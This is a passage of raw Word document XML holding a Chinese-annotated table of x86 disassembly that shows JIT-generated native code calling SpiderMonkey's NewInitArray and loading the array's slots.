        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB70B2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157F4903" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="143"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JIT生成并执行以下本地代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F20C4BE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37287FE5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7" w:after="1"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="117" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1346"/>
        <w:gridCol w:w="672"/>
        <w:gridCol w:w="6962"/>
      </w:tblGrid>
      <w:tr w:rsidR="0026102A" w14:paraId="105F16E3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="190"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27BF49FC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>=&gt; 0x40a044：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7086218F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64C2630F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x8，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="23086996" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFDAD2D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a049：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60E95F5A" w14:textId="43717ABF" w:rsidR="0026102A" w:rsidRPr="004D275C" w:rsidRDefault="004D275C" w:rsidP="004D275C">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="30" w:right="123"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FBEEE3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x38（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ebx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>），％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="7287C15F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C7615B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a04c：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FEEACEF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="426D349A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％ecx，0x14（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="7EEC9EDF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D125A03" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a050：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241412B6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="311E9FFE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="77F47643" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5697DBC7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a052：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AD74A6C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="504EBEA4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>％ebx，0x1c（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="10196DF3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7869DCA0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a056：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1041E2BC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AA3FC78" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x83ceaeb，0x18（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="1B8D01F2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A9BBB66" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a05e：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="037113C5" w14:textId="179B5B99" w:rsidR="0026102A" w:rsidRPr="004D275C" w:rsidRDefault="004D275C">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="123" w:right="123"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24102CA2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">0x82d1820 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>NewInitArray（</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>VMFrame</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>＆，uint32）;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>创建vals数组</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="2D679B79" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B905225" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a063：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AAC15E1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76D03AAB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3071"/>
              </w:tabs>
              <w:spacing w:before="9"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>，％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">; $ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>保存返回的数组对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="479A1210" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AC4336A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a065：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F56E21" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="30" w:right="123"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6962" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="098ED550" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3071"/>
              </w:tabs>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="144"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x24（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>），％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:tab/>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>加载</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>obj</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>slots到</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>edi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="26D109F2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1346" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB3CBE5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:right="141"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x40a068：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18A21976" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
